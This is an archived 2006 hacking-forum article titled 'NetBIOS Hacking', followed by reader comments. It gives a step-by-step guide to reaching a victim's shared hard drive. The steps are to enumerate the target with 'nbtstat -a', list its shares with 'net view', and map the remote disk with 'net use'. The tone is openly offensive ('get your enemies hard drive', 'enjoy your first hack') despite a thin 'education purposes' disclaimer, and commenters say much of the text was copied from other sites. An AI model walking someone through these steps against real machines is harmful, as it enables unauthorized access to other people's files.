Follow us on Twitter!
One mans freedom fighter, another's terrorist.
Sunday, April 20, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 28
Guests Online: 26
Members Online: 2

Registered Members: 82844
Newest Member: Jimmy Zhang
Latest Articles

NetBIOS Hacking

Arrow Image Learn how to get your enemies hard drive!



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
NetBIOS Hacking
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

**** | By g077ch4 | ****

============================
Sunday, August 20 , 2006
============================

Disclaimer: I have written this here article for education purposes only. Using NetNIOS is probably the easiest ways of hacking or rooting
someone remotly. So if you go and get success on someone with NetBIOS, then FBI catches you. Then this is your fault because this article
written for you to know in theory so whatever you do after reading this article was your choice no matter what. So it is not my fault neither is it
HBH\'s fault.

Chapters:

What Is NetBIOS

nbtstat

What do I need for this?

Types Of attacks

Hack Part One


==================================

What is NetBIOS?

NetBIOS was made by IBM and Sytek used for an application programming interface(API) for client software for public access
NetBios stands for: Network-Basic-Input-Output System.NetBios is an API used by application programs on a PC LAN that uses
MS-DOS or some version of UNIX, providing application developers with a uniform set of commands for requesting lower-level
network services. NetBIOS is also is a communication protocol used by Windows for communication on a LAN. When you browse
the network neighborhood for other computers, netbios is involved. Like any other service or API NetBIOS has been assigned to a
port number. This is port number 139.NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various
information of the computers on a network . These Include:

1) Name of the computer

2) Username

3) Domain

4) Computer Name

5) and many others.




==================================

Nbtstat

Nbtstat is a command performed in command promt or MS-DOS. You can reach any of these by going to start>run>cmd. Or start>run>command.
And last but not least that I know of start>run>command.com. But I just use cmd. If you want more information on \"nbtstat\" then go to MD-DOS or cmd
and type nbtstat and it drops a bunch of information that is very useful to your knowledge of Nbtstat and NetBIOS. When you open cmd it should look like this:

C:\\windows>

or for some people it might be

Microsoft Windows XP [Version ***]
<C> Copyright 1985-2001 Microsoft Crop.

C:\\docu<i></i>ments and Settings\\***>

Which ever is fine.

==================================

Now we check if you enemy or target is vulnerable to NetBIOS hacking. But before anything else you should first have their IP address.
Now open up cmd and type:

nbtstat -a ipaddress

Replace \"ipaddess\" with your targets ip address. Now if you get this then it is not vulnerable:

Local Area Connection
Node IpAddress: [127.0.0.1] scope Id: []

Host not found.



==================================


But if you get something like this then it is vulnerable:

NetBIOS Remote Machine Name Table


Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered


MAC Address = 00-02-44-14-23-E6

Note the <20>. It shows that the victim has enabled the file and printer sharing. So other wise if the <20> isnt there then its also not vulnerable.

Next we will use cmd. Type in the following: net view \\\\127.0.0.1

If you get this then your good again:

Shared resources at \\\\203.195.136.156
ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
CDISK Disk


The command completed successfully.
DISK\" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like



Shared resources at \\\\127.0.0.1


ComputerNameGoesHere

Share name Type Used as Comment
c:\\windows>net use k: \\\\127.0.0.1\\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation - The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k! Just double click on it and you will find that you are able to access the remote computer\'s hard disk. Enjoy your first hack!

Also I would like to thank info-x.co.uk for giving me most fo my information for this article

Comments

system_meltdownon August 20 2006 - 22:47:23
Cool article Smile
tancurromon August 20 2006 - 22:48:50
its nice, part from you did next to none of it
dw0rekon August 20 2006 - 23:02:22
sweet, that is a very fast way to check if port 139 is open Pfft
minermonkon August 21 2006 - 00:31:02
lol copy and paste any phrase you like in to google and get 1000+ hits, this is mainly extracts from other articles copy and pasted together to make a 'new' one....its informative at least
korgon August 21 2006 - 08:42:50
LOL, It's mostly from http://info-x.co.. . .asp?id=116
thk-geoon August 21 2006 - 15:50:14
GAURAV KUMAR Did lots of this...
thk-geoon August 21 2006 - 15:50:56
I mean a big part of this (Hate grammar)
g077ch4on August 22 2006 - 04:53:30
thats what i said at the end of the article so.....STFU just playin:angry:
hackerboy666on August 22 2006 - 12:37:40
i swear that article was posted on hackthissite.org aswell.
tancurromon August 22 2006 - 19:33:39
and EG
thk-h3xon August 28 2006 - 20:59:52
And a couple of other sites aswell. Grin
newbeeon February 16 2012 - 17:22:16
203.195.136.156 (is that you ?) :ninja:
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.